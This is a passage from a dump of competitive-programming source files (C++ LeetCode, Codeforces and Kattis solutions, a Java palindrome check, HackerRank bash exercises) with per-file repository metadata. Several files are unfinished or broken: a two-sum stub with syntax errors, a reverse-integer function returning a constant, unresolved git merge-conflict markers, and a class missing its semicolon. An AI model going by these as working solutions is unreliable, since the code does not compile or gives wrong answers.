endl;\r\n\t\t\treturn (u + v * 1.0) / 2;\r\n\t\t}\r\n\tprivate:\r\n\t\tint findMedian(vector<int>& nums1, vector<int>& nums2, int k, bool& ok) {\r\n\t\t\tcout << \"k: \" << k << endl;\r\n\t\t\tok = false;\t\r\n\t\t\tif (nums1.size() == 0) {\r\n\t\t\t\treturn 0;\r\n\t\t\t}\r\n\t\t\tint l = 0, r = nums1.size() - 1;\r\n\t\t\twhile (l <= r) {\r\n\t\t\t\tcout << l << \" \" << r << endl;\r\n\t\t\t\tint mid = (l + r) / 2;\r\n\t\t\t\tcout << \"nums1 mid \" << nums1[mid] << endl;\r\n\t\t\t\tauto pa = equal_range(nums2.begin(), nums2.end(), nums1[mid]);\r\n\t\t\t\tif (pa.first != nums2.end()) {\r\n\t\t\t\t\tcout << \"equal \" << endl;\r\n\t\t\t\t\tint u1 = static_cast<int> (pa.first - nums2.begin());\r\n\t\t\t\t\tint u2;\r\n\t\t\t\t\tif (pa.second != nums2.end())\r\n\t\t\t\t\tu2 = static_cast<int> (pa.second - nums2.begin());\r\n\t\t\t\t\telse u2 = nums2.size();\r\n\t\t\t\t\tif (mid + u1 <= k - 1 && mid + u2 >= k - 1) {\r\n\t\t\t\t\t\tok = true;\r\n\t\t\t\t\t\treturn nums1[mid];\r\n\t\t\t\t\t} \r\n\t\t\t\t\telse if (mid + u1 > k - 1)\r\n\t\t\t\t\t\tr = mid - 1;\r\n\t\t\t\t\telse \r\n\t\t\t\t\t\tl = mid + 1;\r\n\t\t\t\t} else\r\n\t\t\t\t{\r\n\t\t\t\t\tcout << \"not equal \" << endl;\r\n\t\t\t\tint pos;\r\n\t\t\t\tauto ind = upper_bound(nums2.begin(), nums2.end(), nums1[mid]);\r\n\t\t\t\tif (ind == nums2.end()) \r\n\t\t\t\t\tpos = nums2.size();\r\n\t\t\t\telse \r\n\t\t\t\t\tpos = static_cast<int>(ind - nums2.begin());\r\n\t\t\t\tcout << mid << \" \" << pos << endl;\r\n\t\t\t\tif (mid + pos == k - 1) {\r\n\t\t\t\t\tok = true;\r\n\t\t\t\t\treturn nums1[mid];\r\n\t\t\t\t}\r\n\t\t\t\telse if (mid + pos > k - 1)\r\n\t\t\t\t\tr = mid - 1;\r\n\t\t\t\telse \r\n\t\t\t\t\tl = mid + 1;\r\n\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\treturn 0;\r\n\t\t}\r\n};\r\n\r\nint main() {\r\n\tSolution a = Solution();\r\n\tvector<int> nums1 {1, 4};\r\n\tvector<int> nums2 {2, 3};\r\n\tcout << a.findMedianSortedArrays(nums1, nums2);\r\n}\r\n"
},
{
"alpha_fraction": 0.3798449635505676,
"alphanum_fraction": 0.39534884691238403,
"avg_line_length": 24.83333396911621,
"blob_id": "b70379402e8e138d3f80bdc29e1c8fda4a58f989",
"content_id": "1084c4475ac1e10c80737d9d8fa2932493c41f49",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 774,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 30,
"path": "/leetcode/next_permutation.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\nclass Solution {\n public:\n void nextPermutation(vector<int>& nums) {\n for (int i = nums.size() - 1; i >= 0; i--) { \n int ma = 101, k = -1;\n for (int j = i + 1; j < nums.size(); j++) \n if (nums[j] > nums[i] && nums[j] < ma) {\n ma = nums[j];\n k = j;\n }\n if (k != -1) {\n swap(nums[i], nums[k]);\n sort(nums.begin() + i + 1, nums.end());\n return; \n }\n }\n sort(nums.begin(), nums.end());\n }\n};\n\nint main() {\n Solution a = Solution();\n vector<int> nums = {3, 2, 1};\n a.nextPermutation(nums);\n for (int num:nums) \n cout << num;\n}"
},
{
"alpha_fraction": 0.4882943034172058,
"alphanum_fraction": 0.4949832856655121,
"avg_line_length": 15.70588207244873,
"blob_id": "dc84684085e645c26d99af56c4f0bbb74c3d537b",
"content_id": "5eef2f7be6137114bcf89633eb52e37ba6a3500e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 299,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 17,
"path": "/leetcode/reverseInteger.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\nclass Solution {\r\n public:\r\n int reverse(int x) {\r\n string ax = to_string(x);\r\n reverse(ax.begin(), ax.end());\r\n cout << ax;\r\n return 3;\r\n }\r\n};\r\n\r\nint main() {\r\n Solution a = Solution();\r\n a.reverse(3);\r\n}"
},
{
"alpha_fraction": 0.37910446524620056,
"alphanum_fraction": 0.3940298557281494,
"avg_line_length": 21.126436233520508,
"blob_id": "47064ddee3c5b36dbbb72132d672148844f3b107",
"content_id": "87679385d567f74cb7cb8666d4a6e768cbeabfec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2010,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 87,
"path": "/vnoi/message.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n\r\nconst int dx[4] = {-1, 0, 1, 0};\r\nconst int dy[4] = {0, 1, 0, -1};\r\n\r\nconst int NMAX = 8e2 + 3;\r\nint n, m, cnt, connectedComponent = 0;\r\nvector<int> ds[NMAX];\r\nstack<int> st;\r\nint low[NMAX], num[NMAX], inScc[NMAX];\r\nbool inSt[NMAX];\r\n//----------------------------------------\r\nvoid openf() {\r\n int u, v;\r\n cin >> n >> m;\r\n rep(edge, 1, m) {\r\n cin >> u >> v;\r\n ds[u].push_back(v);\r\n }\r\n}\r\n//----------------------------------------\r\nvoid tarjan(int u) {\r\n st.push(u);\r\n inSt[u] = 1;\r\n low[u] = num[u] = ++cnt;\r\n for (auto v: ds[u]) {\r\n if (num[v] == -1) {\r\n tarjan(v);\r\n low[u] = min(low[u], low[v]);\r\n } else if (inSt[v])\r\n low[u] = min(low[u], num[v]);\r\n }\r\n\r\n if (low[u] == num[u]) {\r\n connectedComponent++;\r\n while (true) {\r\n auto curr = st.top();\r\n inSt[curr] = 0;\r\n inScc[curr] = connectedComponent;\r\n st.pop();\r\n if (curr == u) break;\r\n }\r\n }\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n memset(low, -1, sizeof(low));\r\n memset(num, -1, sizeof(num));\r\n cnt = 0;\r\n rep(u, 1, n) \r\n if (num[u] == -1) \r\n tarjan(u);\r\n\r\n memset(inSt, 0, sizeof(inSt));\r\n rep(u, 1, n) \r\n for (auto v: ds[u])\r\n if (inScc[u] != inScc[v])\r\n inSt[inScc[v]] = 1;\r\n\r\n int res = 0;\r\n rep(u, 1, connectedComponent)\r\n res += (1 - inSt[u]);\r\n\r\n cout << res;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n\r\n /*\r\n int testCase;\r\n cin >> testCase;\r\n rep(test, 1, testCase) {\r\n openf();\r\n process();\r\n } */\r\n\r\n openf();\r\n process();\r\n}"
},
{
"alpha_fraction": 0.5760368704795837,
"alphanum_fraction": 0.5760368704795837,
"avg_line_length": 18.81818199157715,
"blob_id": "8ff62a03920641a66a45d6886cc47f712de73154",
"content_id": "d7fa5580c50a6ee55ba93651ca94883b4f9b8b28",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 217,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 11,
"path": "/init/init.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\n#define rep(i, a, b, step) for (auto i = a; i < b; i += step)\n#define repr(i, a, b, step) for (auto i = a; i > b; i -= step)\n\ntypedef pair<int, int> pii;\n\nint main() {\n\n}"
},
{
"alpha_fraction": 0.5435185432434082,
"alphanum_fraction": 0.5509259104728699,
"avg_line_length": 29.823530197143555,
"blob_id": "d05d25ca70f5e4586cfcdfdbfc737c52057c6bd0",
"content_id": "20622b0638c2b1d4c60f133fbc62ca763b0441ee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1080,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 34,
"path": "/katis/grandpabernie.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\nmap<string, int> mapCountry;\r\nvector<vector<int>> visitedCountry;\r\nbool isSorted[100005];\r\n\r\n//----------------------------------------\r\nint main() {\r\n int u, year, currentCountry = -1;\r\n string country;\r\n // freopen(\"test.inp\", \"r\", stdin);\r\n cin >> u;\r\n while (u--) {\r\n cin >> country >> year;\r\n if (mapCountry.find(country) == mapCountry.end()) \r\n mapCountry[country] = ++currentCountry;\r\n int indexCountry = mapCountry[country];\r\n if (indexCountry == currentCountry) \r\n visitedCountry.push_back(vector<int>());\r\n visitedCountry[indexCountry].push_back(year);\r\n }\r\n\r\n cin >> u;\r\n while (u--) {\r\n cin >> country >> year;\r\n int indexCountry = mapCountry[country];\r\n if (isSorted[indexCountry] == false) {\r\n sort(visitedCountry[indexCountry].begin(), visitedCountry[indexCountry].end());\r\n isSorted[indexCountry] = true;\r\n }\r\n cout << visitedCountry[indexCountry][year - 1] << endl;\r\n }\r\n}"
},
{
"alpha_fraction": 0.40050697326660156,
"alphanum_fraction": 0.41444867849349976,
"avg_line_length": 22.909090042114258,
"blob_id": "4c222b59b146917675cb76edb0f144af44d2a0ff",
"content_id": "63bb4062cf8727c7313314db737d052a9837c4e9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 789,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 33,
"path": "/leetcode/find_the_duplicate_numbers.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\n#define rep(i, a, b, step) for (auto i = a; i < b; i += step)\n#define repr(i, a, b, step) for (auto i = a; i > b; i -= step)\n\ntypedef pair<int, int> pii;\n\nclass Solution {\n public:\n int findDuplicate(vector<int>& nums) {\n for (int i = 0; i < nums.size(); i++) {\n if (nums[i] == -1) \n continue;\n int org = i, j = i;\n while (nums[j] > 0) {\n int tg = nums[j] - 1;\n nums[j] = -1;\n j = tg;\n }\n if (j != org) {\n return j + 1;\n }\n } \n return -1;\n }\n};\nint main() {\n Solution a = Solution();\n vector<int> v{1, 3, 3, 4};\n int res = a.findDuplicate(v);\n cout << res;\n}\n"
},
{
"alpha_fraction": 0.3764510750770569,
"alphanum_fraction": 0.4046434462070465,
"avg_line_length": 20.535715103149414,
"blob_id": "d46402302490e3e6cd13bc8a46ca522da87a3bee",
"content_id": "c848343a0687e3e8d376c1c0d59863d56bc7c9d9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 603,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 28,
"path": "/codeforces/1499B.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\nstring s;\nconst int NMAX = 1e2 + 3;\nbool f[NMAX];\n\nvoid process() {\n memset(f, 0, sizeof(f));\n f[0] = 1;\n if (s.length() > 1) \n f[1] = 1;\n for (int i = 2; i < s.size(); i++) {\n f[i] = (f[i - 1] && (s[i - 1] <= s[i]));\n f[i] = f[i] || (s[i - 2] <= s[i] && f[i - 2]);\n }\n cout << ((f[s.length() - 1] || (s.length() > 1 && f[s.length() - 2])) ? \"YES\": \"NO\") << endl;\n}\n\nint main() {\n // freopen(\"test.inp\", \"r\", stdin);\n int test;\n cin >> test;\n while (test--) {\n cin >> s;\n process();\n }\n}\n"
},
{
"alpha_fraction": 0.3177664875984192,
"alphanum_fraction": 0.3238578736782074,
"avg_line_length": 22.452381134033203,
"blob_id": "1948023c0a8544dae06c405f60fd7b556e6eea59",
"content_id": "5665c7efe217e21510df1bfb2bfffd6a64a2f74e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 985,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 42,
"path": "/codeforces/1506B.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\n#define rep(i, a, b, step) for (auto i = a; i <= b; i += step)\n#define repr(i, a, b, step) for (auto i = a; i >= b; i -= step)\n#define it(x, s) for (auto x:s)\n\nint n, k;\nstring s;\n\n//-----------------------------------------------------------\nvoid openf() {\n cin >> n >> k;\n cin >> s;\n}\n//-----------------------------------------------------------\nvoid process() {\n int i = s.find('*');\n int cnt = 1;\n while (true) {\n // cout << i << endl;\n int t = -1;\n rep(j, 1, k, 1) \n if (i + j < s.length() && s[i + j] == '*')\n t = j;\n i = i + t;\n if (t == -1) break;\n cnt += 1;\n // cout << i << \" \" << t << endl;\n }\n cout << cnt << endl;\n}\n//-----------------------------------------------------------\nint main() {\n // freopen(\"test.inp\", \"r\", stdin);\n int test; \n cin >> test;\n while (test--) {\n openf();\n process();\n }\n}\n"
},
{
"alpha_fraction": 0.6137820482254028,
"alphanum_fraction": 0.6618589758872986,
"avg_line_length": 30.100000381469727,
"blob_id": "201904e87e89f8d595a1bd8084e1e3abc6379b9f",
"content_id": "73934ccc27c72746b42df81c06a4c942316fee62",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 624,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 20,
"path": "/leetcode/PalindromeNumber.java",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "<<<<<<< HEAD\n\npublic class PalindromeNumber {\n public boolean isPalindrome(int x) {\n var tmpX = String.valueOf(x);\n return tmpX.equals(new StringBuilder(tmpX).reverse().toString());\n }\n\n public static void main(String[] args) {\n var palindrome = new PalindromeNumber();\n System.out.println(palindrome.isPalindrome(121));\n System.out.println(palindrome.isPalindrome(-121));\n System.out.println(palindrome.isPalindrome(10));\n }\n=======\npublic class PalindromeNumber {\r\n public static void main(String[] args) {\r\n }\r\n>>>>>>> ab9b0d586098bc648496ece1c2e6bb61f2dcf16d\n}"
},
{
"alpha_fraction": 0.4368230998516083,
"alphanum_fraction": 0.45216605067253113,
"avg_line_length": 23.227272033691406,
"blob_id": "014d926340ad9086a5fc5d5f59430a072b69cbee",
"content_id": "66688a342ae28584de4c34bcf315d601041430af",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1108,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 44,
"path": "/katis/template.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n#define iterate(x, z) for (auto x:z)\r\n#define decon(a) show(a); for (auto x: a) cout << x << \" \"; cout << endl\r\n#define debug(x) show(x); cout << x << \" \" << endl;\r\n#define dearr(a, n) show(a); for (int i = 1; i <= n; i++) cout << a[i] << \" \"; cout << endl\r\n#define show(a) cout << #a << \": \"\r\n\r\nconst int dx[4] = {-1, 0, 1, 0};\r\nconst int dy[4] = {0, 1, 0, -1};\r\nconst int oo = 1e9 + 3;\r\nstruct Edge {\r\n int u, v, cost;\r\n Edge(int tu, int tv, int tcost) {\r\n u = tu; v = tv; cost = tcost;\r\n }\r\n};\r\n\r\ntypedef complex<double> Point;\r\n\r\nconst int NMAX = 1e5 + 3;\r\n\r\nint n, m;\r\nvector<int> ds[NMAX];\r\n//----------------------------------------\r\nvoid openf() {\r\n\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n}\r\n//----------------------------------------\r\nint main() {\r\n freopen(\"test.inp\", \"r\", stdin);\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n\r\n openf();\r\n process();\r\n}"
},
{
"alpha_fraction": 0.5484848618507385,
"alphanum_fraction": 0.5515151619911194,
"avg_line_length": 18.625,
"blob_id": "e3460737f087688f1c1d654e585b263a8ed3607c",
"content_id": "512540b2e45a52b3700d5d7facbd153e98cdba79",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 330,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 16,
"path": "/leetcode/two_sum.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n\r\nclass Solution {\r\n\tpublic:\r\n\t\tvector<int> twoSum(vector<int>& nums, int target) {\r\n\t\t\tsort(nums.begin(), nums.end());\t\t\t\r\n\t\t\tfor (auto ind = nums.begin(), ind != nums.end(), ind++) {\r\n\t\t\t\tif (binary_search(ind + 1, nums.end(), target - *ind))\r\n\t\t\t}\r\n\t\t}\r\n};\r\n\r\nint main() {\r\n}\r\n"
},
{
"alpha_fraction": 0.3463687002658844,
"alphanum_fraction": 0.3600248396396637,
"avg_line_length": 25.3389835357666,
"blob_id": "65ae5589076a3b6f3cbfb7def6cf89a1b806d46d",
"content_id": "3c59ff4518503b472096668dd97526a9f4e3811b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1611,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 59,
"path": "/codeforces/272622H.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i <= b; i--)\r\n\r\nconst int NMAX = 1e3 + 3;\r\n\r\nint x, a, b, y, n;\r\npair<int, int> f[NMAX][NMAX];\r\n\r\nvoid openf() {\r\n cin >> x >> a >> y >> b >> n;\r\n}\r\n//--------------------------------------------------\r\npair<int, int> newState(pair<int, int> oldState, int value, int mid) {\r\n return (oldState.second + value < mid) ?\r\n make_pair(oldState.first, oldState.second + value) : make_pair(oldState.first + 1, 0); \r\n}\r\n//--------------------------------------------------\r\nbool check(int mid) {\r\n rep(i, 0, x)\r\n rep(j, 0, y)\r\n f[i][j] = make_pair(0, 0);\r\n\r\n rep(i, 0, x)\r\n rep(j, 0, y) {\r\n if (f[i][j].first == n)\r\n return true;\r\n if (i < x)\r\n f[i + 1][j] = max(f[i + 1][j], newState(f[i][j], a, mid));\r\n if (j < y)\r\n f[i][j + 1] = max(f[i][j + 1], newState(f[i][j], b, mid));\r\n }\r\n\r\n return false; \r\n}\r\n//--------------------------------------------------\r\nvoid process() {\r\n int l = 0, r = x * a + y * b, res = 0;\r\n while (l <= r) {\r\n int mid = (l + r) / 2;\r\n if (check(mid)) {\r\n res = mid;\r\n l = mid + 1;\r\n } else r = mid - 1;\r\n }\r\n\r\n cout << res << endl;\r\n}\r\n//--------------------------------------------------\r\nint main() {\r\n freopen(\"test.inp\", \"r\", stdin);\r\n // freopen(\"test.out\", \"w\", stdout);\r\n for (int t = 1; t <=2; t++) {\r\n openf();\r\n process();\r\n }\r\n}"
},
{
"alpha_fraction": 0.51408451795578,
"alphanum_fraction": 0.5845070481300354,
"avg_line_length": 9.142857551574707,
"blob_id": "d3bd870565ebc57f2519fd1a8e22ab547efdabd0",
"content_id": "6180f07a48f7d9ca2e6703ca11d50e440a67179d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 142,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 14,
"path": "/bash/hackerrank/sort.sh",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#sort1\nsort\n#sort2\nsort -r\n#sort3\nsort -n\n#sort4\nsort -nr\n#sort5\nsort -t $'\\t' -k2 -nr\n#sort6\nsort -t $'\\t' -k2 -n\n#sort7\nsort -t '|' -k2 -nr\n"
},
{
"alpha_fraction": 0.6004183888435364,
"alphanum_fraction": 0.6056485176086426,
"avg_line_length": 31.965517044067383,
"blob_id": "a390162ef91bfe2cad3092421ba46c66f86fb047",
"content_id": "554b73c77166b7326abd97ed04fec713a8dced82",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 956,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 29,
"path": "/leetcode/40.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <vector>\n\nusing namespace std;\n\nclass Solution {\npublic:\n vector<vector<int>> res;\n vector<int> currentCombination;\n vector<vector<int>> combinationSum2(vector<int>& candidates, int target) {\n sort(candidates.begin(), candidates.end());\n tryCombination(candidates, 0, 0, target);\n return res;\n }\n\n void tryCombination(vector<int>& candidates, int currentPos, int currentSum, int target) {\n if (currentSum == target) {\n res.push_back(currentCombination);\n return;\n }\n\n for (int i = currentPos; i < candidates.size(); i++) {\n if (i > currentPos && candidates[i] == candidates[i - 1]) continue;\n if (currentSum + candidates[i] > target) continue;\n currentCombination.push_back(candidates[i]);\n tryCombination(candidates, i + 1, currentSum + candidates[i], target);\n currentCombination.pop_back();\n }\n }\n};\n"
},
{
"alpha_fraction": 0.4277726113796234,
"alphanum_fraction": 0.44641193747520447,
"avg_line_length": 17.18644142150879,
"blob_id": "155001c8e4aa438eed05456378f4b6ab9d3af134",
"content_id": "46f8ee2f28c713ad5d7c1d0e39c6538ec5303ab2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1073,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 59,
"path": "/codeforces/1506D.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\n#include <functional>\n#include <queue>\n#include <utility>\nusing namespace std;\n\n#define rep(i, a, b, step) for (auto i = a; i <= b; i += step)\n#define repr(i, a, b, step) for (auto i = a; i >= b; i -= step)\n\nconst int NMAX = 2e5 + 3;\nint n;\nmap<int, int> m;\npriority_queue<pair<int, int>> pq;\n\nvoid openf() {\n int u;\n cin >> n;\n m.clear();\n rep(i, 1, n, 1) {\n cin >> u;\n m[u] += 1;\n }\n}\n\nvoid process() {\n while (!pq.empty()) \n pq.pop();\n for (auto const &p: m) \n pq.push(make_pair(p.second, p.first));\n\n int sz = n;\n while (pq.size() > 1) {\n auto u1 = pq.top();\n pq.pop();\n auto u2 = pq.top();\n pq.pop();\n sz -= 2;\n u1.first -= 1;\n u2.first -= 1;\n \n if (u1.first != 0)\n pq.push(u1);\n if (u2.first != 0)\n pq.push(u2);\n }\n\n cout << sz << endl;\n}\n\n\nint main() {\n// freopen(\"test.inp\", \"r\", stdin);\n int test;\n cin >> test;\n while (test--) {\n openf();\n process();\n }\n}\n"
},
{
"alpha_fraction": 0.5384615659713745,
"alphanum_fraction": 0.557692289352417,
"avg_line_length": 16.33333396911621,
"blob_id": "8ee2967cd5c9052f56bcb438474c34d6d7082b62",
"content_id": "7f6f4b8bd768767755f03e234413cf2719504d32",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 52,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 3,
"path": "/bash/hackerrank/arth.sh",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "read arth\nres=$(bc -l <<< $arth)\nprintf \"%.3f\" $res\n"
},
{
"alpha_fraction": 0.5959183573722839,
"alphanum_fraction": 0.5959183573722839,
"avg_line_length": 20.454545974731445,
"blob_id": "3a4f84516bb3c11e0e3308499912d5323eb23413",
"content_id": "62b5c7500bb262d97e62d614f7147d1ff068a1c4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 245,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 11,
"path": "/katis/katis_different.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#define ll long long\r\n\r\n#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\nint main() {\r\n ll first_number, second_number;\r\n while (cin >> first_number >> second_number) {\r\n cout << abs(second_number - first_number) << endl;\r\n }\r\n}"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 8,
"blob_id": "c6af4b8f25195da5af971e0a7240bf936d9bb32f",
"content_id": "fc4143984b999d54a833911bc82539e6db23f21b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 36,
"license_type": "no_license",
"max_line_length": 10,
"num_lines": 4,
"path": "/bash/hackerrank/head.sh",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#head1\nhead -n 20\n#head2\nhead -c 20\n"
},
{
"alpha_fraction": 0.41615384817123413,
"alphanum_fraction": 0.4276922941207886,
"avg_line_length": 22.11111068725586,
"blob_id": "795800547bf02c81f74158bf732a251b9da7a4b4",
"content_id": "a38c77f98f117411e4157b9b59f2685351ce3abf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1300,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 54,
"path": "/katis/pikemaneasy.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n\r\nconst int oo = 1e9 + 7;\r\n\r\nint n, contestTime, A, B, C, t0;\r\npriority_queue<int, vector<int>, greater<int>> pq;\r\n//----------------------------------------\r\nvoid openf() {\r\n cin >> n >> contestTime;\r\n cin >> A >> B >> C >> t0; \r\n }\r\n//----------------------------------------\r\nvoid process() {\r\n pq.push(t0);\r\n int temp = t0;\r\n rep(i, 1, n - 1) {\r\n temp = (((ll)A * temp + B) % C) + 1;\r\n pq.push(temp);\r\n }\r\n\r\n int maxNumber = 0, penaltyCounter = 0, totalTime = 0;\r\n while (!pq.empty()) {\r\n if (totalTime <= contestTime - pq.top()) {\r\n totalTime += pq.top();\r\n maxNumber += 1;\r\n penaltyCounter = (penaltyCounter + totalTime) % oo;\r\n }\r\n pq.pop();\r\n }\r\n\r\n cout << maxNumber << \" \" << penaltyCounter;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n\r\n /**\r\n int testCase;\r\n cin >> testCase;\r\n rep(test, 1, testCase) {\r\n openf();\r\n process();\r\n } */\r\n\r\n openf();\r\n process();\r\n}"
},
{
"alpha_fraction": 0.44547995924949646,
"alphanum_fraction": 0.4650512635707855,
"avg_line_length": 24.571428298950195,
"blob_id": "2a41e1be0b17aff6c15f8197041c97d22ca6648b",
"content_id": "f440968d2e794ca1602484ad1ecef3c39ca53c3a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1073,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 42,
"path": "/leetcode/815.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\n#define rep(i, a, b, step) for (auto i = a; i < b; i += step)\n#define repr(i, a, b, step) for (auto i = a; i > b; i -= step)\n\ntypedef pair<int, int> pii;\n\nclass Solution {\n public:\n bool isUsed[503];\n int d[1000003];\n queue<int> q;\n vector<int> routeList[100003];\n int numBusesToDestination(vector<vector<int>>& routes, int source, int target) {\n for (auto i = 0; i < routes.size(); i++)\n for (auto u: routes[i])\n routeList[u].push_back(i);\n\n d[source] = 1;\n q.push(source);\n while (!q.empty()) {\n auto u = q.front();\n q.pop();\n for (auto routeIndex: routeList[u]) {\n if (isUsed[routeIndex]) continue;\n isUsed[routeIndex] = true;\n for (auto v: routes[routeIndex]) {\n if (d[v] != 0) continue;\n d[v] = d[u] + 1;\n q.push(v);\n }\n }\n }\n return d[target] - 1;\n\n }\n}\n\nint main() {\n\n}"
},
{
"alpha_fraction": 0.4482535719871521,
"alphanum_fraction": 0.4702458083629608,
"avg_line_length": 28.352941513061523,
"blob_id": "3b2bccc07cf0c3c2ae731c2a7d33bf9eba2e717f",
"content_id": "9734c1c1b46ba9f7bcd5797c22cad03355ab609d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1546,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 51,
"path": "/katis/collatz.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
